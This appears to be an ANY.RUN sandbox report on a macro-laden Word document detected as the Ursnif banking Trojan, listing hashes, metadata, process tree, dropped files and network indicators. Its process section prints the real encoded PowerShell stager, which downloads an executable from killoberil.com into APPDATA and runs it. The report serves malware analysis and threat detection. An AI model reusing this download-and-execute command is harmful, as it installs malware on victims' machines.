analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ELVIA_GROUP.doc

Full analysis: https://app.any.run/tasks/27901812-fe68-48e6-bbbd-85a570eb9644
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: December 06, 2018, 07:32:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Reverse-engineered foreground benchmark, Subject: Maryland Will, Comments: Organic 24 hour standardization, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 25 22:21:00 2018, Last Saved Time/Date: Wed Dec 5 23:46:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
MD5:

9BA75CCEC7AD7A0014D67C6C78FCEBB2

SHA1:

7EF125962E0668391150E7C234CC350AD43ABEF4

SHA256:

8CF54A8B4657FB6657CCD3B8B586F4C48F6CF72CB4803438950D482F03578F6B

SSDEEP:

1536:lLjFFlu+vZtpP9HWn/TiFGOb5RywCsdD73I6O6:PuGtpP9HW/+k6LhO6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3004)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3004)
    • Executes PowerShell scripts

      • cMd.EXE (PID: 3572)
    • URSNIF was detected

      • powershell.exe (PID: 288)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 288)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3004)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
  • Reverse-engineered foreground benchmark
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 2
Paragraphs: 1
Lines: 1
Bytes: 23552
Company: -
Manager: -
CodePage: Windows Cyrillic
Security: None
Characters: 2
Words: -
Pages: 1
ModifyDate: 2018:12:05 23:46:00
CreateDate: 2018:04:25 21:21:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal
Comments: Organic 24 hour standardization
Keywords: -
Author: -
Subject: Maryland Will
Title: Reverse-engineered foreground benchmark
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3004"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ELVIA_GROUP.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3572cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBrAGkAbABsAG8AYgBlAHIAaQBsAC4AYwBvAG0ALwBLAEgAWgAvAGQAaQB1AHkAegAuAHAAaABwAD8AbAA9AHQAeQBzAGsAMgAuAHQAawBuACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA5ADMAZgA5AGEAYwA2AGUALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADkAMwBmADkAYQBjADYAZQAuAGUAeABlACcAOwAgAEUAeABpAHQAC:\Windows\system32\cMd.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
288poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBrAGkAbABsAG8AYgBlAHIAaQBsAC4AYwBvAG0ALwBLAEgAWgAvAGQAaQB1AHkAegAuAHAAaABwAD8AbAA9AHQAeQBzAGsAMgAuAHQAawBuACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA5ADMAZgA5AGEAYwA2AGUALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADkAMwBmADkAYQBjADYAZQAuAGUAeABlACcAOwAgAEUAeABpAHQAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMd.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 345
Read events
930
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7FB.tmp.cvr
MD5:
SHA256:
288powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PP38AT7XQ8FPX037C5AC.temp
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF5DD9971AC364D66D.TMP
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F4842056-64C5-44EC-A1B7-D1315516BD41}.tmp
MD5:
SHA256:
3004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C6EC08AB-8F04-4C59-B56D-ACD5354C293E}.tmp
MD5:
SHA256:
288powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b4ad.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:344F012F65E96D5799DCDFC927DB7DBA
SHA256:83908E4E4F8E2272CA97594A6D2569CDACED34C4636131237D1F7AD041028DBE
288powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3004WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C9005899C42F58E9E7C96DCB3A5EE8E3
SHA256:BAAA4B86601B2CDBDAF8C9D3F3076A6A57EBB0E5FFD49CF53E039A90105750E4
3004WINWORD.EXEC:\Users\admin\Desktop\~$VIA_GROUP.docpgc
MD5:075E3D779727741C3E19184C75402963
SHA256:2EDC4691EE9635C19BFB3CA4069D77498DD46D6A9F9F6D3222D0DAE69BEFDA3F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
288
powershell.exe
GET
404
109.234.39.133:80
http://killoberil.com/KHZ/diuyz.php?l=tysk2.tkn
RU
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
288
powershell.exe
109.234.39.133:80
killoberil.com
Webzilla B.V.
RU
suspicious

DNS requests

Domain
IP
Reputation
killoberil.com
  • 109.234.39.133
suspicious

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info